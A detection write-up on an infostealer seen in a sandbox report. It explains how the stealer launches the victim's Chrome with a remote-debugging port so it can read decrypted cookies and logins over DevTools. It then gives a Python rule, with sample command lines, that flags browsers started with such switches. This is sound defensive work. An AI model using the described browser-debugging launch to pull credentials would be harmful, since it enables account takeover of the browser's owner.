Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_0100DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext, 23_2_0100DF51
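The process-creation record above, in which file.exe starts the victim's own Chrome with --remote-debugging-port=9229 on the Default profile, is the behaviour behind the "Attempt to bypass Chrome Application-Bound Encryption" signature: rather than decrypting the cookie database itself, the stealer lets the browser do it and reads cookies and logins back over the DevTools protocol. The debugging listener binds to loopback only, so network sensors will not see it; the place to catch it is process-creation telemetry with command lines (Sysmon Event ID 1, Security 4688 with command-line auditing, or EDR). The following detection logic is an added example and is not part of the sandbox report or of Joe Sandbox. The ProcEvent fields and the sample events are constructed; the first event mirrors the report's command line, the others are benign or developer-style launches for contrast.

```python
"""Flag Chromium-based browsers launched with DevTools remote-debugging switches.

Added example, not code from the sandbox report. ProcEvent is an assumed,
minimal shape for a process-creation event; map it from your own telemetry.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Browsers whose cookies/logins can be pulled over the DevTools protocol once
# the browser itself runs with debugging enabled.
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe", "chromium.exe"}

# Parents that legitimately start a browser. A debug switch from one of these
# (a developer's shortcut) is worth a look but is not conclusive on its own.
EXPECTED_PARENTS = {"explorer.exe", "userinit.exe", "svchost.exe", "sihost.exe"} | BROWSERS

# Switches that expose the DevTools protocol or hide the window.
DEBUG_SWITCH_NAMES = {
    "--remote-debugging-port", "--remote-debugging-pipe", "--remote-debugging-address",
    "--remote-allow-origins", "--headless",
}
PORT = re.compile(r"--remote-debugging-port=(\d+)", re.I)


@dataclass
class ProcEvent:
    parent_image: str   # full path of the creating process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


@dataclass
class Finding:
    severity: str                 # "high" or "medium"
    port: Optional[int]           # remote-debugging port, if one was given
    switches: List[str]           # the offending switches as they appeared
    reasons: List[str] = field(default_factory=list)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def switches_of(cmdline: str) -> List[str]:
    # Chromium switches are --name or --name=value; values may be quoted.
    return re.findall(r"--[\w-]+(?:=\S+)?", cmdline)


def assess(ev: ProcEvent) -> Optional[Finding]:
    """Return a Finding if a browser was started with a debugging switch, else None."""
    if basename(ev.image) not in BROWSERS:
        return None
    debug = [s for s in switches_of(ev.command_line)
             if s.split("=", 1)[0].lower() in DEBUG_SWITCH_NAMES]
    if not debug:
        return None
    m = PORT.search(ev.command_line)
    port = int(m.group(1)) if m else None
    reasons = [f"browser started with {', '.join(debug)}"]
    parent = basename(ev.parent_image)
    if parent in EXPECTED_PARENTS:
        severity = "medium"
    else:
        severity = "high"
        reasons.append(f"unexpected parent process {parent}")
    return Finding(severity, port, debug, reasons)


def scan(events: List[ProcEvent]) -> List[Tuple[ProcEvent, Finding]]:
    hits = []
    for ev in events:
        f = assess(ev)
        if f is not None:
            hits.append((ev, f))
    return hits


# Constructed sample events. The first mirrors the report's process-creation line.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\file.exe",
              r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"'),
    # Ordinary user launch from the shell: no finding.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'),
    # Developer shortcut: same switch, expected parent, separate data dir -> medium.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir=C:\dev\profile'),
    # Headless Edge started by a script host -> high.
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
              r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --remote-debugging-port=9222'),
    # Not a browser: ignored.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r"notepad.exe C:\Users\user\notes.txt"),
]

if __name__ == "__main__":
    for ev, f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {basename(ev.parent_image)} -> {basename(ev.image)} "
              f"port={f.port} :: {'; '.join(f.reasons)}")
```

Do not key the rule on a specific port: 9222 is merely the conventional default and this sample used 9229. Also match on the switch regardless of --profile-directory or --user-data-dir, since a stealer may copy the profile elsewhere and point the browser at the copy. Developer hosts that legitimately run DevTools automation should be allowlisted by parent process or host rather than by weakening the switch list.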